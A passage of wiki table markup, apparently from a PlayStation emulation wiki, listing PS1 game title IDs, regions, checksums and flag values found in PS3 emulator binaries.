/> | SLES_021.70 || Eur || SLES-02170 || Wu-Tang - Taste the Pain || 1 || 46846f41 || 0000000100000001 || 1.02++<br /> |-<br /> | SLES_028.65 || Eur || SLES-02865 || X-Men - Mutant Academy || 1 || 402a6cc3 || 0000000100000001 || 1.02++<br /> |-<br /> | SLES_037.36 || Eur || SLES-03736 || DragonBall Z - Ultimate Battle 22 || 1 || 49f87116 || 0000000100010000 || 1.02++<br /> |-<br /> | SCES_016.95 || Eur || SCES-01695 || Disney's Mulan - Animated Storybook || 1 || 1cd06fbd || 0000000b000089ea || 1.02++<br /> |-<br /> | SLES_019.07 || Eur || SLES-01907 || V-Rally 2 - Championship Edition || 2 || 217f73b9 || 0000000b0000c0ee || 1.02++<br /> |-<br /> | SLES_026.89 || Eur || SLES-02689 || Need for Speed - Porsche 2000 || 1 || 697a6c9d || 0000000100000100 || 1.02++<br /> |-<br /> | SLES_013.01 || Eur || SLES-01301 || Soul Reaver - Legacy of Kain || 1 || d3e2755e || 0000000b0000b722 || 1.02++<br /> |-<br /> | SLES_004.83 || Eur || SLES-00483 || Worms Pinball || 1 || ffae73a0 || 0000000c00000001 || 1.02++<br /> |-<br /> | SLES_000.99 || Eur || SLES-00099 || International Moto X || 1 || 545b76f8 || 0000000100000080 || 1.02++<br /> |-<br /> | SLES_018.16 || Eur || SLES-01816 || Driver || 1 || 9f5d70fb || 0000000100000080 || 1.02++<br /> |-<br /> <br /> <br /> | SLES_008.09 || Eur || SLES-00809 || N2O Nitrous Oxide || 1 || a28f6de2 || 0000001500000003 || <br /> |-<br /> | SLES_000.82 || Eur || SLES-00082 || G-Police [Disc1of2] || 1 || 7137379 || 0000001500000003 || <br /> |-<br /> | SLES_100.82 || Eur || SLES-10082 || G-Police [Disc2of2] || 1 || b7b67390 || 0000001500000003 || <br /> |-<br /> | SLES_000.24 || Eur || SLES-00024 || Tomb Raider || 1 || 20a071df || 0000001500000003 || <br /> |-<br /> | SCES_028.73 || Eur || SCES-02873 || Vib-Ribbon || 1 || 5aad6cad || 0000001500000003 || <br /> |-<br /> <br /> <br /> <br /> | SLUS_013.82 || Usa || SLUS-01382 || X Men Mutant Academy 2 || 1 || ae74739a || 0000000100000001 || 1.10++<br /> |-<br /> | SLUS_010.41 || Usa || SLUS-01041 || Chrono Cross [Disc1of2] || 1 || a69371a0 || 0000001500000003 || 1.02++<br /> |-<br /> | SLUS_010.80 || Usa || SLUS-01080 || Chrono Cross [Disc2of2] || 1 || 868e72c8 || 0000001500000003 || 1.02++<br /> |-<br /> | SLUS_013.91 || Usa || SLUS-01391 || Cabela's Big Game Hunter - Ultimate Challenge || 1 || c8777043 || 0000000100010000 || 1.02++<br /> |-<br /> | SLUS_006.31 || Usa || SLUS-00631 || Kartia - The Word of Fate || 1 || 23877090 || 0000000100000080 || 1.02++<br /> |-<br /> | SLUS_008.62 || Usa || SLUS-00862 || Next Tetris, The || 1 || 607074ae || 0000000100000001 || 1.02++<br /> |-<br /> | SLUS_000.19 || Usa || SLUS-00019 || Wing Commander III - Heart of the Tiger [Disc1of4] || 1 || 32fe7217 || 0000000d00000001 || 1.02++<br /> |-<br /> | SLUS_005.53 || Usa || SLUS-00553 || Alundra || 1 || 1c62708d || 0000000e00000078 || 1.02++<br /> |-<br /> | SLUS_005.54 || Usa || SLUS-00554 || Colony Wars [Disc2of2] || 1 || 8c9670e0 || 0000000e00000078 || 1.02++<br /> |-<br /> | SLUS_011.04 || Usa || SLUS-01104 || Need for Speed - Porsche Unleashed || 1 || 2cf66cd6 || 0000000100000100 || 1.02++<br /> |-<br /> <br /> <br /> | SLUS_005.44 || Usa || SLUS-00544 || G-Police [Disc1of2] || 1 || 6fcf72df || 0000001500000003 || <br /> |-<br /> | SLUS_005.56 || Usa || SLUS-00556 || G-Police [Disc2of2] || 1 || f5a872f0 || 0000001500000003 || <br /> |-<br /> | SLUS_001.52 || Usa || SLUS-00152 || Tomb Raider || 1 || c06c711b || 0000001500000003 || <br /> |-<br /> | SLUS_004.37 || Usa || SLUS-00437 || Tomb Raider II || 1 || cb24738b || 0000001500000003 || <br /> |-<br /> | SLUS_004.35 || Usa || SLUS-00435 || Ninja - Shadow of Darkness || 1 || c1b574cf || 0000001500000003 || <br /> |-<br /> | SLUS_000.38 || Usa || SLUS-00038 || FIFA '96 || 1 || cc726deb || 0000001500000003 || <br /> |-<br /> |}<br /> <br /> ===== TitleID/DiscID in ps1_netemu =====<br /> {|class=&quot;wikitable sortable&quot;<br /> |-<br /> ! ID in netemu.self !! Region !! DiscID !! Title !! unk !! checksum !! flags !! FW<br /> |-<br /> | SCPS_101.06 || Jap || SCPS-10106 || Arc the Lad III [Disc1of2] || 1 || 53226b9c || 0000001000000020 || <br /> |-<br /> | SCPS_101.07 || Jap || SCPS-10107 || Arc the Lad III [Disc2of2] || 1 || 90f76b40 || 0000001000000020 || <br /> |-<br /> | SLPS_018.80 || Jap || SLPS-01880 || Final Fantasy VIII [Disc1of4] || 1 || d8446e20 || 0000000000000001 || <br /> |-<br /> | SLPS_018.81 || Jap || SLPS-01881 || Final Fantasy VIII [Disc2of4] || 1 || d4c76d1b || 0000000000000001 || <br /> |-<br /> | SLPS_018.82 || Jap || SLPS-01882 || Final Fantasy VIII [Disc3of4] || 1 || 18126e07 || 0000000000000001 || <br /> |-<br /> | SLPS_018.83 || Jap || SLPS-01883 || Final Fantasy VIII [Disc4of4] || 1 || 12376e34 || 0000000000000001 || <br /> |-<br /> | SLPS_023.64 || Jap || SLPS-02364 || Chrono Cross [Disc1of2] || 4 || 40b572aa || 00000024fffffff0 || <br /> |-<br /> | SLPS_023.65 || Jap || SLPS-02365 || Chrono Cross [Disc2of2] || 4 || 55e87206 || 00000024fffffff0 || <br /> |-<br /> | SLPS_021.57 || Jap || SLPS-02157 || Tantei Jinguuji Saburo - Early Collection || 1 || ff40721f || 0000001a00000002 || <br /> |-<br /> | SLPS_017.51 || Jap || SLPS-01751 || Elie no Atelier - Atelier Elie || 1 || bcdf6fa3 || 0000001100000001 || <br /> |-<br /> | SLPS_911.80 || Jap || SLPS-91180 || Elie no Atelier - Atelier Elie [PlayStation the Best] || 1 || 8047091 || 0000001100000001 || <br /> |-<br /> | SLPM_866.02 || Jap || SLPM-86602 || Blade Arts || 1 || 5a746ec3 || 0000001700000032 || <br /> |-<br /> | SLPS_005.82 || Jap || SLPS-00582 || Beltlogger 9 || 3 || ba436ecc || 0000001d00000001 || <br /> |-<br /> | SCPS_101.15 || Jap || SCPS-10115 || Alundra 2 || 1 || 56086c54 || 0000001200000006 || <br /> |-<br /> | SLPM_860.72 || Jap || SLPM-86072 || Konami Antiques - MSX Collection Vol.3 || 1 || 4373729f || 000000120000000d || <br /> |-<br /> | SCPS_180.12 || Jap || SCPS-18012 || Vib-Ribbon || 1 || dbb96c5c || 0000001000000120 || <br /> |-<br /> | SLPS_012.22 || Jap || SLPS-01222 || BioHazard 2 [Disc1of2] || 1 || f5f773c5 || 00000003000007d0 || <br /> |-<br /> | SLPS_012.22 || Jap || SLPS-01222 || BioHazard 2 [Disc1of2] || 1 || 7d8d73b7 || 00000003000007d0 || <br /> |-<br /> | SLPS_017.93 || Jap || SLPS-01793 || Initial D || 1 || 4fa46da5 || 00000016ffffff80 || <br /> |-<br /> | SLPM_864.59 || Jap || SLPM-86459 || Sanvein [SuperLite 1500 Series] || 1 || c78a748b || 0000001000000080 || <br /> |-<br /> | SLPS_026.21 || Jap || SLPS-02621 || Strider Hiryu 1 &amp; 2 [Disc2of2] || 1 || c3157410 || 0000002800000002 || <br /> |-<br /> | SCPS_100.03 || Jap || SCPS-10003 || Crime Crackers || 1 || ed04760d || 0000001100000001 || <br /> |-<br /> | SCPS_180.11 || Jap || SCPS-18011 || Um Jammer Lammy || 1 || 286070c5 || 0000000000000000 || <br /> |-<br /> | SLPS_018.53 || Jap || SLPS-01853 || The Adventure of Little Ralph || 1 || 9d4473e4 || 0000002a00000514 || <br /> |-<br /> | SCPS_101.03 || Jap || SCPS-10103 || Robbit mon Dieu || 1 || 6e516dad || 0000002a00000514 || <br /> |-<br /> | SCPS_100.47 || Jap || SCPS-10047 || Crash Bandicoot 2 || 1 || 56d97048 || 0000002a00000514 || <br /> |-<br /> | SLPS_033.12 || Jap || SLPS-03312 || Shinsou Kaiten: Wanwan Umi Monogatari: Sanyo Pachinko Paradise DX || 1 || a0ce6ca9 || 0000002a00000514 || <br /> |-<br /> | SLPM_861.85 || Jap || SLPM-86185 || Athena Awakening Form The Ordinary Life [Disc 1] || 1 || ebaf6f5d || 0000002a00000514 || <br /> |-<br /> | SLPM_861.86 || Jap || SLPM-86186 || Athena Awakening Form The Ordinary Life [Disc 2] || 1 || 3e696c8a || 0000002a00000514 || <br /> |-<br /> | SLPM_861.87 || Jap || SLPM-86187 || Athena Awakening Form The Ordinary Life [Disc 3] || 1 || 81d86e23 || 0000002a00000514 || <br /> |-<br /> | SCPS_100.91 || Jap || SCPS-10091 || Ape Escape || 2 || c30f6e06 || 0000001000000004 || <br /> |-<br /> | SCPS_100.99 || Jap || SCPS-10099 || Ore no Ryouri || 2 || 9502715f || 0000002a00000514 || <br /> |-<br /> | SCPS_100.73 || Jap || SCPS-10073 || Crash Bandicoot 3 || 2 || 73e06e8f || 0000002a00000514 || <br /> |-<br /> | SLPS_026.33 || Jap || SLPS-02633 || Sanyo Pachinko Paradise 3 || 1 || 1a696e28 || 0000002a00000514 || <br /> |-<br /> | SLPS_029.88 || Jap || SLPS-02988 || Sanyo Pachinko Paradise 4 || 1 || 3fad6f38 || 0000002a00000514 || <br /> |-<br /> | SLPM_866.40 || Jap || SLPM-86640 || Formation Soccer '98 - Ganbare Nippon in France [MajorWave 1500 Series] || 2 || f9db6f2d || 0000002a00000514 || <br /> |-<br /> | SLPS_026.61 || Jap || SLPS-02661 || Brigandine - Grand Edition [Disc 1] || 1 || c49b6f05 || 0000002a00000514 || <br /> |-<br /> | SLPS_026.62 || Jap || SLPS-02662 || Brigandine - Grand Edition [Disc 1] || 1 || 6d7d6f1b || 0000002a00000514 || <br /> |-<br /> | SLPS_023.00 || Jap || SLPS-02300 || Biohazard 3 Last Escape || 2 || 9b397352 || 0000002a00000514 || <br /> |-<br /> | SLPS_024.89 || Jap || SLPS-02489 || Harvest Moon: Back To Nature || 2 || 8f4676c6 || 0000002a00000514 || <br /> |-<br /> | SLPS_030.87 || Jap || SLPS-03087 || Harvest Moon: Back To Nature for Girls || 2 || 30f078ac || 0000002a00000514 || <br /> |-<br /> | SLPM_860.33 || Jap || SLPM-86033 || Tobal 2 || 1 || 1b467259 || 0000002a00000514 || <br /> |-<br /> | SLPS_007.17 || Jap || SLPS-00717 || Tilk: Aoi Umi kara Kita Shoujo || 1 || 9f01700a || 0000001f000007d0 || <br /> |-<br /> | SLPM_873.31 || Jap || SLPM-87331 || Front Mission 2 [Front Mission History] || 3 || fda96f69 || 0000000300000258 || <br /> |-<br /> | SLPS_002.00 || Jap || SLPS-00200 || Battle Arena Toshinden 2 || 1 || f2a57355 || 0000001d00000001 || <br /> |-<br /> | SLPS_016.26 || Jap || SLPS-01626 || Himitsu Sentai Metamor V Deluxe [Disc 1] || 1 || 70627260 || 0000001000000020 || <br /> |-<br /> | SLPS_016.27 || Jap || SLPS-01627 || Himitsu Sentai Metamor V Deluxe [Disc 2] || 1 || a5c7210 || 0000001000000020 || <br /> |-<br /> | SLPS_028.17 || Jap || SLPS-02817 || Fire Pro Wrestling G || 1 || 8c73710b || 0000002e00000002 || <br /> |-<br /> | SLPM_871.17 || Jap || SLPM-87117 || TwinBee RPG || 1 || 51e66f74 || 0000002e00000002 || <br /> |-<br /> | SCPS_100.89 || Jap || SCPS-10089 || Wild Arms - 2nd Ignition [Disc 1] || 1 || e39f71b3 || 0000000c00001388 || <br /> |-<br /> | SCPS_100.90 || Jap || SCPS-10090 || Wild Arms - 2nd Ignition [Disc 2] || 1 || 68d771a3 || 0000000c00001388 || <br /> |-<br /> | SLPS_017.50 || Jap || SLPS-01750 || Ehrgeiz - God Bless the Ring || 3 || 5d6c741f || 0000002d00000001 || <br /> |-<br /> | SLPM_870.68 || Jap || SLPM-87068 || AI Shogi Selection [MajorWave 1500 Series] || 1 || a9f26fc8 || 0000001000000001 || <br /> |-<br /> | SLPS_010.65 || Jap || SLPS-01065 || Puzzle Bobble 3 DX || 1 || 6c1f6c29 || 0000001000000002 || <br /> |-<br /> | SLPS_019.90 || Jap || SLPS-01990 || SaGa Frontier 2 || 1 || 9f817715 || 0000001100000001 || <br /> |-<br /> | SLPS_002.49 || Jap || SLPS-00249 || Kokumeikan - Trap Simulation Game || 1 || 17867187 || 0000001100000001 || <br /> |-<br /> | SLPS_011.71 || Jap || SLPS-01171 || Samurai Spirits IV: Amakusa Revenge Special || 1 || 3c5e7167 || 0000001000000001 || <br /> |-<br /> | SLPS_028.58 || Jap || SLPS-02858 || Suna no Embrace - Eden no Sato no Never || 1 || a8426b24 || 0000001100000001 || <br /> |-<br /> | SLPS_030.12 || Jap || SLPS-03012 || Little Princess +1 - Maru Oukoku no Ningyou Hime 2 || 2 || 24857336 || 0000000300000032 || <br /> |-<br /> | SLPM_872.84 || Jap || SLPM-87284 || Azito [MajorWave Series] || 2 || 6b607035 || 0000001100000001 || <br /> |-<br /> | SLPS_001.94 || Jap || SLPS-00194 || Wizard's Harmony || 1 || b01d7540 || 0000001000000002 || <br /> |-<br /> | SLPS_014.21 || Jap || SLPS-01421 || Kagerou - Kokumeikan Shinshou || 1 || 5e466c72 || 0000001100000001 || <br /> |-<br /> | SLPS_013.83 || Jap || SLPS-01383 || FIFA Road to World Cup '98 || 1 || 2e3872b6 || 00000003000005dc || <br /> |-<br /> | SLPS_022.99 || Jap || SLPS-02299 || Kyousouba Ikusei Simulation - Derby Stallion 99 || 1 || 7b146d4e || 0000001100000001 || <br /> |-<br /> | SLPS_007.77 || Jap || SLPS-00777 || Derby Stallion - Thoroughbred Simulation Game || 1 || d5197559 || 0000001100000001 || <br /> |-<br /> | SLPS_031.35 || Jap || SLPS-03135 || Memorial * Series: Sunsoft Vol. 1 || 1 || 19e96efa || 0000001100000001 || <br /> |-<br /> | SLPS_018.20 || Jap || SLPS-01820 || Palm Town || 1 || f0b06d6a || 00000003000000c8 || <br /> |-<br /> | SLPS_012.42 || Jap || SLPS-01242 || Motteke Tamago with Ganbare Kamonohasi || 1 || c9497214 || 0000001200000014 || <br /> |-<br /> | SLPM_860.95 || Jap || SLPM-86095 || The King of Fighters Kyo || 1 || 39fe7168 || 0000001100000001 || <br /> |-<br /> | SLPM_863.45 || Jap || || || 1 || 20436c49 || 0000001f000001f4 || <br /> |-<br /> | SCPS_100.33 || Jap || || || 1 || 660971a5 || 0000001100000001 || <br /> |-<br /> | SLPM_866.13 || Jap || || || 5 || 2f647175 || 000000120000000c || <br /> |-<br /> | SLPS_002.15 || Jap || || || 1 || 34c16e53 || 0000001100000001 || <br /> |-<br /> | SLPS_002.16 || Jap || || || 1 || b9796ea7 || 0000001100000001 || <br /> |-<br /> | SCPS_100.71 || Jap || || || 1 || 16ab6e7b || 0000001100000001 || <br /> |-<br /> | SLPS_000.10 || Jap || || || 1 || b36372e0 || 0000001100000001 || <br /> |-<br /> | SLPM_872.30 || Jap || || || 1 || c72770b2 || 0000001200000014 || <br /> |-<br /> | SLPS_000.28 || Jap || || || 1 || 6087000 || 0000001100000001 || <br /> |-<br /> | SLPS_006.40 || Jap || || || 1 || 41c872d2 || 0000001000000002 || <br /> |-<br /> | SCPS_100.21 || Jap || || || 3 || 9f9b6e69 || 0000002d00000001 || <br /> |-<br /> | SLPS_914.44 || Jap || || || 5 || b9317410 || 000000120000000c || <br /> |-<br /> | SLPS_914.45 || Jap || || || 5 || c1007411 || 000000120000000c || <br /> |-<br /> | SCPS_100.60 || Jap || || || 2 || 4bca6fd6 || 0000001f00000320 || <br /> |-<br /> | SLPS_006.24 || Jap || || || 1 || 6a767294 || 0000002e00000002 || <br /> |-<br /> | SLPS_018.18 || Jap || || || 1 || 2f686de7 || 0000000000000000 || <br /> |-<br /> | SLPS_018.19 || Jap || || || 3 || bcf36f23 || 0000001100000001 || <br /> |-<br /> | SLPM_860.28 || Jap || SLPM-86028 || Final Fantasy IV || 4 || 770f6f03 || 000000250000002a || <br /> |-<br /> | SLPS_001.80 || Jap || || || 3 || a017720f || 0000000300000258 || <br /> |-<br /> | SLPS_007.23 || Jap || || || 1 || 2e5a6fc9 || 0000001100000001 || <br /> |-<br /> | SLPS_007.77 || Jap || || || 1 || 5837561 || 0000001100000001 || <br /> |-<br /> | SLPS_001.71 || Jap || || || 1 || 41ce713c || 000000120000000e || <br /> |-<br /> | SLPS_022.66 || Jap || || || 1 || d73b735b || 0000001000000020 || <br /> |-<br /> | SLPS_022.67 || Jap || || || 1 || b3347162 || 0000001000000020 || <br /> |-<br /> | SLPS_022.68 || Jap || || || 1 || 1f547343 || 0000001000000020 || <br /> |-<br /> | SLPS_022.69 || Jap || || || 1 || 5b797240 || 0000001000000020 || <br /> |-<br /> | SLPS_003.04 || Jap || || || 1 || b4570c7 || 0000001000000020 || <br /> |-<br /> | SLPS_003.05 || Jap || || || 1 || 2f7c6d6c || 0000001000000020 || <br /> |-<br /> | SLPS_011.90 || Jap || || || 4 || 5f51743a || 0000000c00000000 || <br /> |-<br /> | SLPS_011.91 || Jap || || || 4 || 8f317483 || 0000000c00000000 || <br /> |-<br /> | SLPS_011.92 || Jap || || || 4 || f13275bc || 0000000c00000000 || <br /> |-<br /> | SLPS_011.93 || Jap || || || 4 || 5f51743a || 0000000c00000000 || <br /> |-<br /> | SLPS_011.94 || Jap || || || 4 || 8f317483 || 0000000c00000000 || <br /> |-<br /> | SLPS_011.95 || Jap || || || 4 || f13275bc || 0000000c00000000 || <br /> |-<br /> | SLPM_861.23 || Jap || || || 2 || 6480711b || 0000001e000007d0 || <br /> |-<br /> | SLPS_015.43 || Jap || || || 1 || 6a956f92 || 0000002800000002 || <br /> |-<br /> | SLPS_015.44 || Jap || || || 1 || 28157073 || 0000002800000002 || <br /> |-<br /> | SLPS_015.45 || Jap || || || 1 || b0f86f7a || 0000002800000002 || <br /> |-<br /> | SLPS_021.08 || Jap || || || 1 || fee172c6 || 00000003000001f4 || <br /> |-<br /> | SLPS_019.26 || Jap || || || 5 || c74271dc || 0000000300000384 || <br /> |-<br /> | SLPM_862.24 || Jap || || || 3 || 43406d6f || 000000030000012c || <br /> |-<br /> | SLPM_862.25 || Jap || || || 3 || 8f686d14 || 000000030000012c || <br /> |-<br /> | SLPS_002.48 || Jap || || || 1 || eb08766f || 0000001000000002 || <br /> |-<br /> | SLPS_003.42 || Jap || || || 1 || ed3675b2 || 0000001000000002 || <br /> |-<br /> | slps_002.67 || Jap || || || 1 || daa073db || 0000001d00000002 || <br /> |-<br /> | SLPS_000.06 || Jap || || || 2 || 37a1705b || 0000001100000001 || <br /> |-<br /> | SLPS_000.31 || Jap || || || 1 || fbde704d || 0000001100000001 || <br /> |-<br /> | SLPS_014.20 || Jap || || || 5 || fc4671f3 || 00000003000001f4 || <br /> |-<br /> | SLPM_867.75 || Jap || || || 3 || f0926ff3 || 0000001200000000 || <br /> |-<br /> | SLPM_867.76 || Jap || || || 2 || 5bf1723f || 0000001200000000 || <br /> |-<br /> | SLPM_865.49 || Jap || || || 2 || 6c3f7219 || 0000000100000002 || <br /> |-<br /> | SLPM_865.50 || Jap || || || 2 || f5873a1 || 0000000100000002 || <br /> |-<br /> | SLPM_868.81 || Jap || || || 1 || 4927738c || 0000001000000020 || <br /> |-<br /> | SLPM_868.82 || Jap || || || 1 || 22927190 || 0000001000000020 || <br /> |-<br /> | SLPS_027.26 || Jap || || || 1 || f3156ecc || 00000004000000c8 || <br /> |-<br /> | SLPM_867.15 || Jap || || || 1 || 20a6e24 || 00000004000000c8 || <br /> |-<br /> | SIPS_600.27 || Jap || || || 1 || 53b97685 || 00000003000001f4 || <br /> |-<br /> | SLPS_004.77 || Jap || || || 4 || 7f0773ca || 00000003000004b0 || <br /> |-<br /> | SLPS_004.78 || Jap || || || 4 || 415873c2 || 00000003000004b0 || <br /> |-<br /> | SLPS_004.79 || Jap || || || 4 || 42607296 || 00000003000004b0 || <br /> |-<br /> | SLPS_004.80 || Jap || || || 4 || 423873a1 || 00000003000004b0 || <br /> |-<br /> | SLPS_029.23 || Jap || || || 3 || 87036e9e || 00000003000002bc || <br /> |-<br /> | SLPS_000.83 || Jap || || || 7 || 427c7116 || 0000001200000008 || <br /> |-<br /> | SLPM_870.70 || Jap || || || 1 || f8a473bc || 0000001400000010 || <br /> |-<br /> | SLPM_872.70 || Jap || || || 2 || c76c716e || 00000003000001f4 || <br /> |-<br /> | SLPS_011.33 || Jap || || || 5 || bbd96ebe || 0000001100000001 || <br /> |-<br /> | SLPS_002.38 || Jap || || || 1 || 8fe37274 || 0000001100000001 || <br /> |-<br /> | SLPS_015.48 || Jap || || || 5 || 24377013 || 000000120000000a || <br /> |-<br /> | SLPM_867.12 || Jap || || || 1 || 49de6ed5 || 0000001100000001 || <br /> |-<br /> | SLPS_019.02 || Jap || || || 1 || a0926c45 || 0000001100000001 || <br /> |-<br /> | SLPS_013.11 || Jap || || || 1 || 11206da7 || 0000001a00000002 || <br /> |-<br /> | SLPS_023.61 || Jap || SLPS-02361 || Touge Max G || 2 || c1556eb3 || 0000000300000708 || <br /> |-<br /> | SLPS_017.80 || Jap || || || 3 || f77873aa || 0000000300000578 || <br /> |-<br /> | SLPS_017.81 || Jap || || || 3 || 6e073ac || 0000000300000578 || <br /> |-<br /> | SLPS_019.21 || Jap || || || 1 || f7e572c0 || 0000001000000020 || <br /> |-<br /> | SLPS_019.22 || Jap || || || 1 || 7d1d72b0 || 0000001000000020 || <br /> |-<br /> | SLPS_011.79 || Jap || || || 1 || 3e7b73c7 || 0000001100000001 || <br /> |-<br /> | SLPS_024.79 || Jap || || || 1 || 22e86ba3 || 0000001d00000001 || <br /> |-<br /> | SLPS_000.25 || Jap || || || 1 || 7e2873eb || 00000019000002bc || <br /> |-<br /> | SLPS_017.16 || Jap || || || 1 || ffe3710d || 0000000100000002 || <br /> |-<br /> | SLPS_017.37 || Jap || || || 2 || 8eae73b0 || 0000001100000001 || <br /> |-<br /> | SLPS_027.43 || Jap || || || 1 || 5b556e33 || 00000018ffffffff || <br /> |-<br /> | SLPS_010.45 || Jap || || || 1 || 4aac6cee || 0000001000000020 || <br /> |-<br /> | SLPS_010.46 || Jap || || || 1 || 845f6c71 || 0000001000000020 || <br /> |-<br /> | SLPS_010.47 || Jap || || || 1 || 9ff6c64 || 0000001000000020 || <br /> |-<br /> | SLPS_011.57 || Jap || || || 1 || dee270e9 || 00000004000000c8 || <br /> |-<br /> | SLPS_013.88 || Jap || || || 1 || 7e896ddd || 00000004000000c8 || <br /> |-<br /> | SLPS_004.16 || Jap || || || 1 || fe9a6e57 || 0000000100000001 || <br /> |-<br /> | SCES_016.95 || Eur || SCES-01695 || Disney's Mulan - Animated Storybook || 1 || 1cd06fbd || 00000015000089ea || <br /> |-<br /> | SLES_019.07 || Eur || SLES-01907 || V-Rally 2 - Championship Edition || 1 || 217f73b9 || 000000150000c0ee || <br /> |-<br /> | SLES_013.01 || Eur || SLES-01301 || Soul Reaver - Legacy of Kain || 1 || d3e2755e || 000000150000b722 || <br /> |-<br /> | SLES_005.56 || Eur || || || 1 || b2376d4b || 0000001100000001 || <br /> |-<br /> | SCES_021.05 || Eur || || || 1 || 24066f28 || 000000020017d3d4 || <br /> |-<br /> | SCES_003.11 || Eur || || || 1 || d0317129 || 000000020017d57c || <br /> |-<br /> | SCES_000.08 || Eur || || || 1 || 20037398 || 0000002e00000002 || <br /> |-<br /> | SLES_007.55 || Eur || || || 1 || aad37657 || 0000001400000004 || <br /> |-<br /> | SLES_013.43 || Eur || || || 1 || c47d73b4 || 0000002e00000002 || <br /> |-<br /> | SLES_113.43 || Eur || || || 1 || e4c373b5 || 0000002e00000002 || <br /> |-<br /> | SCES_000.61 || Eur || || || 1 || 7d876dc2 || 0000001a00000002 || <br /> |-<br /> | SLES_027.54 || Eur || || || 1 || cf2870bb || 000000020017d67c || <br /> |-<br /> | sles_027.90 || Eur || || || 1 || 5c1f6b0b || 0000001100000001 || <br /> |-<br /> | SCES_022.85 || Eur || || || 3 || e8466f95 || 0000000d00000032 || <br /> |-<br /> | SCES_122.85 || Eur || || || 3 || 85fe6e5c || 0000000d00000032 || <br /> |-<br /> | SLES_017.60 || Eur || || || 1 || e8576c52 || 0000001100000001 || <br /> |-<br /> | SCES_039.37 || Eur || || || 1 || bb1e6e47 || 0000001100000001 || <br /> |-<br /> | SLES_031.78 || Eur || || || 1 || 43d56cc9 || 0000001100000001 || <br /> |-<br /> | SCUS_945.08 || Usa || || || 1 || 18d56d2a || 0000001a00000002 || <br /> |-<br /> | SCUS_949.00 || Usa || || || 1 || 124f71ad || 0000001a00000002 || <br /> |-<br /> | SCUS_943.09 || Usa || || || 1 || a9c66fe4 || 0000001a00000002 || <br /> |-<br /> | SCUS_941.03 || Usa || || || 1 || df4c6dbb || 0000001a00000002 || <br /> |-<br /> | SLUS_002.13 || Usa || || || 1 || cff7372 || 0000001a00000002 || <br /> |-<br /> | SCUS_943.02 || Usa || || || 1 || 7e67394 || 0000002e00000002 || <br /> |-<br /> | SCUS_944.76 || Usa || || || 1 || f7656d79 || 0000001a00000002 || <br /> |-<br /> | SCUS_943.01 || Usa || || || 1 || 24f17103 || 0000001a00000002 || <br /> |-<br /> | SCUS_943.56 || Usa || || || 1 || 776872c1 || 0000001a00000002 || <br /> |-<br /> | SCUS_944.26 || Usa || || || 4 || 24f37297 || 0000001200000010 || <br /> |-<br /> | SCUS_944.84 || Usa || || || 2 || 6bd87066 || 0000000c00001388 || <br /> |-<br /> | SCUS_944.98 || Usa || || || 2 || 6f0c7218 || 0000000c00001388 || <br /> |-<br /> | SCUS_941.08 || Usa || || || 1 || 4f066ffa || 0000001a00000002 || <br /> |-<br /> | SCUS_941.63 || Usa || || || 1 || 1d04759b || 0000001a00000002 || <br /> |-<br /> | SCUS_941.64 || Usa || || || 1 || 62c7665 || 0000001a00000002 || <br /> |-<br /> | SCUS_941.65 || Usa || || || 1 || 981f74c6 || 0000001a00000002 || <br /> |-<br /> | SCUS_942.21 || Usa || || || 1 || 5d9973b1 || 0000001a00000002 || <br /> |-<br /> | SCUS_943.55 || Usa || || || 1 || 60476e89 || 0000001a00000002 || <br /> |-<br /> | SCUS_944.51 || Usa || || || 3 || 916a6f8a || 0000000d00000032 || <br /> |-<br /> | SCUS_944.92 || Usa || || || 3 || 254f6e71 || 0000000d00000032 || <br /> |-<br /> | SLUS_009.58 || Usa || || || 1 || 70356caf || 0000001a00000002 || <br /> |-<br /> | SLUS_003.79 || Usa || || || 1 || a9a06e01 || 0000001a00000002 || <br /> |-<br /> | SLUS_004.10 || Usa || || || 1 || 96316d15 || 0000001a00000002 || <br /> |-<br /> | SLUS_004.31 || Usa || || || 2 || f1636d84 || 0000001100000001 || <br /> |-<br /> | SLUS_004.85 || Usa || || || 2 || 45c86d54 || 0000001100000001 || <br /> |-<br /> | SLUS_006.65 || Usa || || || 2 || 30946c87 || 0000001100000001 || <br /> |-<br /> | SLUS_006.67 || Usa || || || 2 || d3dc6c57 || 0000001100000001 || <br /> |-<br /> | SLUS_010.41 || Usa || SLUS-01041 || Chrono Cross [Disc1of2] || 4 || a69371a0 || 00000024fffffff0 || <br /> |-<br /> | SLUS_010.80 || Usa || SLUS-01080 || Chrono Cross [Disc2of2] || 4 || 868e72c8 || 00000024fffffff0 || <br /> |-<br /> | SLUS_008.79 || Usa || || || 1 || 25e96d12 || 0000001d00000002 || <br /> |-<br /> | SLUS_002.38 || Usa || || || 1 || 4c1c7189 || 0000001a00000002 || <br /> |-<br /> | SLUS_001.13 || Usa || || || 1 || f2bd6ee2 || 0000001a00000002 || <br /> |-<br /> | SLUS_002.36 || Usa || || || 2 || c1117292 || 0000001400000004 || <br /> |-<br /> | SLUS_005.18 || Usa || || || 1 || d212739f || 0000001a00000002 || <br /> |-<br /> | SLUS_004.40 || Usa || || || 1 || e28f729a || 0000001a00000002 || <br /> |-<br /> | SLUS_000.61 || Usa || || || 1 || e1b4752c || 0000001a00000002 || <br /> |-<br /> | SLUS_000.67 || Usa || || || 1 || dc237170 || 0000001e00000708 || <br /> |-<br /> | SLUS_000.42 || Usa || || || 3 || 93c071a2 || 000000030000044c || <br /> |-<br /> | SLUS_000.27 || Usa || || || 1 || 3b037462 || 0000001a00000002 || <br /> |-<br /> | SLUS_001.52 || Usa || SLUS-00152 || Tomb Raider || 1 || 59207131 || 0000001a00000002 || <br /> |-<br /> | SLUS_002.32 || Usa || || || 1 || 55e74c4 || 0000001a00000002 || <br /> |-<br /> | SLUS_004.37 || Usa || SLUS-00437 || Tomb Raider II || 1 || cb24738b || 0000001a00000002 || <br /> |-<br /> | SCUS_943.04 || Usa || || || 1 || c0546d88 || 0000001a00000002 || <br /> |-<br /> | SLUS_007.07 || Usa || || || 1 || 2c9d6e1e || 000000030000044c || <br /> |-<br /> | SCUS_944.24 || Usa || || || 1 || 6c8c7285 || 0000001d00000008 || <br /> |-<br /> | SLUS_000.19 || Usa || SLUS-00019 || Wing Commander III - Heart of the Tiger [Disc1of4] || 4 || 32fe7217 || 0000000300000320 || <br /> |-<br /> | SLUS_001.34 || Usa || || || 4 || f84a722c || 0000000300000320 || <br /> |-<br /> | SLUS_001.35 || Usa || || || 4 || 993a71df || 0000000300000320 || <br /> |-<br /> | SLUS_001.36 || Usa || || || 4 || f6f4718e || 0000000300000320 || <br /> |-<br /> | SLUS_002.70 || Usa || || || 4 || e562706a || 0000000300000320 || <br /> |-<br 